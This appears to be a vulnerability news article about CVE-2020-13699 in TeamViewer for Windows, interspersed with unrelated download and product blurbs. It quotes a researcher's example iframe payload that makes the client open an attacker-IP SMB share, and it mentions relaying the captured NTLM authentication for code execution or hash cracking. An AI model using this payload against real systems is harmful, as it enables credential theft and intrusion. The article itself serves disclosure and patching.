A high-risk vulnerability (CVE-2020-13699) in TeamViewer for Windows could be exploited by remote attackers to crack users’ password and, consequently, lead to further system exploitation.
- Get support for your mobile device from any Windows or Mac computer! You can now receive technical remote support for your mobile devices. Technicians have the ability to chat, transfer files back and forth, view device information, stop processes, push and pull Wi-Fi settings, and much more. It is even possible for your device (Samsung, Sony., Asus, Lenovo, HTC, LG, ZTE, Huawei, Alcatel One.
- TeamViewer allows you to establish incoming and outgoing remote desktop and computer-to-computer connections for real-time support or access to files, networks, and programs. It also features instant chat, video calls, and group meetings and chat. It is a simple program that can be run with/without installation.
This article applies to all TeamViewer customers who need to download TeamViewer 8 or 9. General The downloads on this page are only recommended for customers with older licenses that may not be used with the newest release. TeamViewer 9 Windows Full version QuickSupport QuickJoin Host Portable MSI package Manager.
Teamviewer.com Download Free
About TeamViewer
TeamViewer is an application developed by German company TeamViewer GmbH and is available for Windows, macOS, Linux, Chrome OS, iOS, Android, Windows RT Windows Phone 8 and BlackBerry operating systems.
It is used primarily for remote access to and control of various types of computer systems and mobile devices, but also offers collaboration and presentation features (e.g., desktop sharing, web conferencing, file transfer, etc.)
Since the advent of COVID-19, enterprise use of the software has increased due to many employees being forced to work from home.
About the vulnerability (CVE-2020-13699)
CVE-2020-13699 is a security weakness arising from an unquoted search path or element – more specifically, it’s due to the application not properly quoting its custom URI handlers – and could be exploited when the system with a vulnerable version of TeamViewer installed visits a maliciously crafted website.
Teamviewer Login
“An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play attacker-IPsharefake.tvs') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” explained Jeffrey Hofmann, a security engineer with Praetorian, who discovered and responsibly disclosed the flaw.
“Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”
As noted before, exploitation of the flaw can be initiated remotely and requires no previous authentication. The flaw seems ideal for targeted watering hole attacks.
Teamviewer.com
There is no indication that this vulnerability is being exploited in the wild and no public exploit is currently available.
Teamviewer Free
CIS assesses that the risk of exploitation is high for large and medium government and business entities, medium for small government and business entities, and low for home users.
Teamviewer Download
According to the company, the vulnerability affects TeamViewer versions 8 through 15 (up to 15.8.2) for the Windows platform. Users are advised to upgrade to version 15.8.3 to close the hole.